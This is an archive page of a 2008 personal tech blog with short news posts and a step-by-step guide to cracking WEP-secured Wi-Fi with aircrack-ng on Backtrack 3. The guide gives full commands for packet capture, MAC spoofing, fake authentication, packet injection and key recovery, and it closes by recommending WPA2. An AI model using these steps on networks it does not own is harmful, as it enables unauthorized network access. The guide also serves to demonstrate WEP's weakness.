Found something useful? Don't forget to leave a comment!

Thursday, October 30, 2008

Copy a key with only a photo

Keys Can be Copied From Afar, Jacobs School Computer Scientists Show [Jacobs School of Engineering: News & Events]

This just in: computer science researchers at UCSD have released software that can be used to duplicate a key with only
a photo. Apparently, this whole setup works by measuring "key" (pardon the pun) points within the photo to come up
with exact dimensions of the key, which can then be used to create a duplicate. Sounds completely impossible and sci-fi,
but that aside, this has some pretty big implications. Like, don't post pictures of your house/carkeys online (at least without
blurring 'em first.)
Needless to say, this capability brings up some interesting new possibilities...the locksmith's job just got a whole lot easier.
Of course, one must also consider the potential liabilities, for example house theft and burglary!

calcGRADE 2008 Revision 1 Released

After an unreasonably long wait, for which laziness was partially responsible, Revision 1 of my calcGRADE 2008 gradebook suite for TI-89 Titanium and Voyage 200 graphing calculators has been released. This is mostly a bugfix/cosmetic update, and remedies several major issues. CG2008 R1 is the most stable release yet, and it should handle anything and everything you throw at it. The code was finalized at the beginning of October, but I haven't had a chance to do anything with it until now. So without further ado, here it is!

A changelog...
Revision 1: October 1, 2008

  • info window no longer appears at startup
  • updated About window with new contact info
  • updated Manual
  • fixed critical off-by-one bug preventing creation of new classes after deleting a class
  • class average no longer shows as "undef" in certain scenarios with EC assignments
  • now resets to original folder location when exiting
  • various minor tweaks and optimizations

And some updated screenshots:





I will be posting this on ASAP, but until then, you can pick it up on my account:

As always, a full PDF manual is included.

Enjoy and happy grading!

Friday, October 24, 2008

Developrs to get Vista SP2 Next Week

Microsoft to Seed Vista SP2 to Developers Next Week - News and Analysis by PC Magazine

An interesting bit of news. Windows Vista's second service pack made be made available to some developers (not the public) as early as October 29th. Purported features include Windows Search 4, Bluetooth enhancements, native Blu-ray recording, and exFAT FS improvements.
But can this SP save Vista's image? My opinion is no. Even though one can safely say that the majority of users have no problem with Microsoft's latest OS, the small, disgruntled minority has heavily tarnished Vista's public image. Service Pack 2 will do little to change that perception, unfortunately.

Wikipedia School Edition DVD Available

2008/9 Wikipedia Selection for schools

Everyone I know uses Wikipedia, that user-powered, open encyclopedia that may be awesome or awful depending on the article.
Well, Wikipedia has announced the release of a DVD packed with 3.5GB of only "awesome" articles, according to the volunteers
from SOS Children who content-checked the compilation. There are 5500 articles, complete with pictures.
The distribution is only available via BitTorrent (yay!)

Find download details and information here.

Now only if EVERY Wikipedia article could be checked...

Monday, October 20, 2008

NVIDIA releases GeForce 9300/9400 IGPs

DailyTech - NVIDIA Officially Unveils GeForce 9400 and 9300 Integrated GPUs

Not long after the launch of the mobile counterparts in Apple's new MacBook line, NVIDIA has officially unveiled their GeForce 9300/9400 desktop motherboard chipsets for Intel LGA775 processors. These new boards will be available from the typical slew of mobo makers. The new GPUs have 16 cores and are fully equipped to handle H.264, VC-1, and MPEG2 decoding as well as uncompressed 8-channel LPCM - features highly coveted in the home theater PC (HTPC) arena. The new chips are 65nm and should be more powerful yet power-efficient than the previous AMD-based GeForce 8200/8300 generation. Finally, Intel users now have a media/theater platform that can be viable - the new 9300/9400 series is a significant step compared to Intel's flawed G35/G45 boards and nVidia's aging nForce 610/630 boards. For those (heaven forbid) extreme budget gamers, the 9400 actually leads the pack in games like ET: Quake Wars and Age of Conan, when compared to AMD's highly competitive 780G/790GX IGP solution.

Wednesday, October 15, 2008

Flash Player 10 Out Now

Adobe's Flash 10 Player Harnesses Graphics Chips - News and Analysis by PC Magazine

All you Flash users (that's more or less everyone these days), Flash 10 is out now. PC Magazine brings up the interesting point that the release neatly follows Microsoft's unveiling of Silverlight 2.0. Adobe claims that the new Flash will use the GPU to do graphics work and have more sophisticated audio features.

Download now:

Monday, October 13, 2008

HowTo: Crack WEP-Secured Wireless Networks Using Backtrack 3 and the Intel 3945 card

WEP stands for "Wired Equivalent Privacy", but this is more or less a misnomer. Wikipedia goes so far as to call it a "deprecated protocol". WEP definitely does not equal the (relative) privacy on a switched wired network, and provides only a minimal amount of privacy. Why? Well, first of all, the WEP protocol is fundamentally flawed as the initialization vectors (IVs) generated are nonrandom; certain IVs, called weak IVs, are vulnerable to statistical attack. This is where tools like aircrack come in. Today, I'll demonstrate the triviality with which a WEP-"secured" wireless network can be cracked and the key recovered. The tools for the job? Nothing more than a two-year-old commodity laptop with the ubiquitous Intel 3945 wireless card and Backtrack 3, a FOSS Linux distro oriented toward penetration testing. We will be using the aircrack-ng suite to collect data from the target network and its client(s) and perform packet injection.

Before we begin, a disclaimer:
The following information is geared toward people with a thorough and advanced understanding of computer hardware and software. A working knowledge of wireless networking terms and console-based Linux is assumed. If you don't know the difference between a BSSID, ESSID, and a MAC address, or have no idea what Linux is, GET OUT NOW! The information can be used for both good and bad, and it is understood that I take no responsibility for anything that happens as a result, directly or indirectly.

Materials Needed:

  • Backtrack 3 (USB install is preferred, LiveCD is OK too)
  • working laptop with an Intel 3945ABG wireless card
  • WEP-secured wireless network (hopefully your own!!!)

Boot up your lappy and load Backtrack 3. Now, BT3 already has the ipwraw-ng injection driver installed into the kernel. There are two catches, though: it is not enabled by default AND the preinstalled binary is not up to date (2.0.0 instead of 2.3.4).

First, unload the regular iwl3945 driver:
# modprobe -r iwl3945

Prepare and load the new v2.3.4 ipwraw-ng driver:
# cd /opt/drivers/ipwraw-ng
# ./remove-old
# make;make install
# modprobe ipwraw

A little housekeeping to optimize transmission rate and power:
# iwconfig wifi0 rate 1M
# iwconfig wifi0 txpower 16
# cd

If you had trouble running the txpower command, you have NOT properly set up the ipwraw-ng driver!

Now the real fun begins. If you don't already know the BSSID, ESSID, and channel of the target access point, run a survey with airodump-ng:
# airodump-ng wifi0

Once you have obtained those three pieces of information, hit Control-C to exit.

Now we refine airodump-ng to isolate the target network:
# airodump-ng --channel X --bssid TARGETMAC wifi0
Insert your specific channel and BSSID, of course :)

Let this run for a few minutes, then CTRL-C again. If all goes well the MAC address of a wireless client should appear under "STATION". Take note of the MAC, as we will be using it to spoof our own MAC address:
# macchanger -m CLIENTMAC wifi0

Now we will run airodump-ng for real. All captured packets will be saved to disk. Notice the -w flag. DO NOT CLOSE THIS WINDOW!
# airodump-ng --channel X --bssid TARGETMAC -w dump1 wifi0

Technically, we could just sit here and wait for the packet/data count to increase, but that will take a looooong time if the wireless client(s) aren't active. To remedy that, we use packet injection to increase the number of data packets sent by the target AP.

Before we begin injecting, we must perform a fake authentication against the target. Open another window and run:
# aireplay-ng -1 0 -a TARGETMAC -h CLIENTMAC wifi0
If all goes well you should see something like this.fakeauth

Now that we have "authenticated" against the target AP, we can begin injecting with aireplay-ng. Open yet another window and do:
# aireplay-ng -3 -b TARGETMAC -h CLIENTMAC wifi0
You should see the injecting occurring in real time:

Go back to the window with airodump-ng. The data count should be rapidly increasing, and before long you will have tens of thousands of packets!

For cracking a 64-bit WEP key, 40,000 packets are often enough. For a 128-bit key, you want somewhere around 80,000 packets. When a high data count is achieved, aircrack-ng can be started to begin the cracking process:
# aircrack-ng dump1-01.cap

Remember to keep aireplay-ng running, because aircrack can optimize itself with new data packets on-the-fly. The more packets, the faster the cracking (and the more likely you will successfully recover the key.)

With time and a bit of luck you should have the key in hex format...the key to the city, err, network. If it's not your own very careful what you decide to do next ;)

And so we have succeeded in demonstrating the ease with which WEP can be defeated, with nothing more than a laptop and some free software tools. The moral of the story? Use WPA/WPA2 encryption, or for maximum security, turn off your wireless altogether. Even these new protocols are vulnerable in certain cases, thanks to dictionary attacks  and rainbow tables. An effective way to counter these types of attacks is to use long passwords - WPA2 supports a maximum length of 63 characters.

There you have it - a nice and simple "basic" WEP crack. This method assumes an ideal scenario where at least one wireless client is present. If no clients are present, more work must be done in order to generate data packets - this requires packet crafting and is beyond the current scope. Try your hand a few times and see how fast you can go. Can you beat the FBI's three-minute mark (set back in 2005) or the more recent times of less than a minute?

Sunday, October 5, 2008

KVIrc 3.4.0 ThinApp Released

Today I bring you a portable ThinApp version of the free, open-source chat client KVIrc, version 3.4.0. It's my IRC client of choice, and in my opinion can holds its own against shareware client mIRC in just about every aspect.

Grab your copy and throw it onto your USB here:

Download from SkyDrive